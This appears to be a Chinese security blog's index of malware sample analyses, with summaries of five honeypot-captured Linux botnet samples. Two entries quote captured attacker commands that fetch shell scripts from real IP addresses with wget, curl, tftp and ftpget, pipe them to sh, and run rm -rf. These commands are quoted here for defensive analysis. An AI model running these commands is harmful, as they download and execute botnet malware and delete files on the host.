• MalwareMustDie MK64 样本分析

    0x00 背景

    这次捕获样本的亮点在于有个自保过程,也是有一定的Flood功能,VT上监测如下,但行为和标注出来的家族都不太一样,就暂且将其称为MK64吧,本文主要是静态分析动态验证一下,MMD:

    Read on →

  • MalwareMustDie Ddostf 样本分析

    0x00 背景

    蜜罐上又捕获一HFS上下载的恶意软件,从功能上看和之前的lx样本类似,只不过加了些Flood方法和功能,VT上一看原来都是是属于Ddostf家族。以后还是会分析些不同家族的样本,从多个角度分析样本的特征,毕竟时代在变化嘛。

    Read on →

  • MalwareMustDie lx样本分析

    0x00 背景

    蜜罐上捕获到wget下载的样本,顺着网址一访问发现是用HttpFileServer v2.3k 299国产软件搭建的http服务,隐约感觉这种软件会有溢出漏洞,但也没时间去看页面就访问不了了。可以证明其下载的恶意软件出自国人之手,VT上也还没有相关的检测:

    Read on →

  • MalwareMustDie bakunawa-ssh™样本分析

    0x00 背景

    最近还是通过ssh蜜罐捕获到样本,都是通过下载sh脚本文件并执行:

    wget -qO - http://198.1.70.128/1sh | sh > /dev/null 2>&1 &
    rm -rf /var/run/1sh; wget -c http://198.1.70.128/1sh -P /var/run && sh /var/run/1sh &
    wget -qO - http://198.1.70.128/2sh | sh > /dev/null 2>&1 &
    rm -rf /tmp/2sh; wget -c http://198.1.70.128/2sh -P /tmp && sh /tmp/2sh &
    curl http://198.1.70.128/3sh | sh
    cd /dev/shm ; rm -rf tsh ; tftp -g 127.0.0.1 -r tsh ; sh tsh &
    

    Read on →

  • MalwareMustDie Gucci样本分析

    0x00 背景

    在ssh蜜罐上捕获到恶意样本,执行的命令如下:

    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://212.47.239.249/justyzoat.sh; chmod 777 justyzoat.sh; sh justyzoat.sh; tftp 212.47.239.249 -c get tutftp1.sh; chmod 777 tutftp1.sh; sh tutftp1.sh; tftp -r tutftp2.sh -g 212.47.239.249; chmod 777 tutftp2.sh; sh tutftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 212.47.239.249 tuftp1.sh tuftp1.sh; sh tuftp1.sh; rm -rf justyzoat.sh tutftp1.sh tutftp2.sh tuftp1.sh; rm -rf *
    

    Read on →